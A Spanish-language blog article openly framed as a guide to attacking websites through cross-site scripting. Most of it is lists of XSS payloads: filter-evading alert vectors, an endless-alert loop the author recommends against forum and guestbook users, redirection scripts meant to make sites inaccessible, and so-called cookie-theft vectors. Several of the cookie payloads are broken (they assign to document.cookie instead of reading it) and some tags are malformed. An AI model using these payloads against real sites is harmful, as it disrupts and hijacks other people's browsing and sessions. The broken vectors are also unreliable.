XSS

Artículo por: Carluís Pérez

En esta sección vamos a ver una serié de filtros y ejemplos de XSS (Cross Site Scripting) orientados a ataques y penetración de sitios webs con vulnerabilidades XSS, espero que esto pueda ayudarles y proporcionarles ideas.

Mensaje de alerta XSS
Con este código se generará un mensaje de alerta en toda la página vulnerable, el mensaje es modificable:

<script>alert("XSS");</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RM'XSS'")`> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="  javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IMG SRC='vbscript:msgbox("XSS")'> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(
javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> Una forma simple de tocar las narices a los usuarios es meter alerts interminables. Eso les obligará a matar el proceso del navegador, por muchas pestañas que tengan. Si ocurre en mitad de una transacción u otro momento importante de la navegación puede resultar desastroso para el usuario, este método es más efectivo en libros de visita o foros vulnerables:
<script>for (;;) alert("XSS infinito");</script>

Redirección XSS
Para realizar una redirección y hacer que una web resulte inaccesible, podemos probar utilizando document.location, window.location, location.assign y location.replace, todo generaría el mismo resultado de redirección:
<script>document.location.href = "http://carluys.blogspot.com/";</script> <script>window.location = "http://carluys.blogspot.com/";</script> <script>location.assign(""http://carluys.blogspot.com/"");</script> <script>location.replace("http://carluys.blogspot.com/");</script>

Robo de cookies y sesiones
A través de la propiedad document.cookie podemos sacar la cookie que está utilizando el usuario:
<script language="javascript">alert("XSS Cookie: " + document.cookie);</script <IMG SRC="javascript:document.cookie=true;"> <IMG DYNSRC="javascript:document.cookie=true;"> <IMG LOWSRC="javascript:document.cookie=true;"> <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <iframe src="javascript:document.cookie=true;> <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <BODY BACKGROUND="javascript:document.cookie=true;"> <BODY ONLOAD=document.cookie=true;> <BGSOUND SRC="javascript:document.cookie=true;"> <BR SIZE="&{document.cookie=true}"> <LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <TABLE BACKGROUND="javascript:document.cookie=true;"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="background-image: url(
javascript:document.cookie=true;)"> <DIV STYLE="width: expression(document.cookie=true);"> <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <iframe src="javascript:document.cookie=true;> <div onmouseover="document.cookie=true;"> <div style="background-image: url(javascript:document.cookie=true;);"> <div style="width: expression(document.cookie=true;);"> <body onload="document.cookie=true;"> <iframe src="javascript:document.cookie=true;>

Codificación de caracteres

ASCII Text:

Enter your XSS here

Hex Value:

URL:

HTML (with semicolons):

Decimal Value:

HTML (without semicolons):

Base64 Value (a more robust base64 calculator can be found here)

Base64: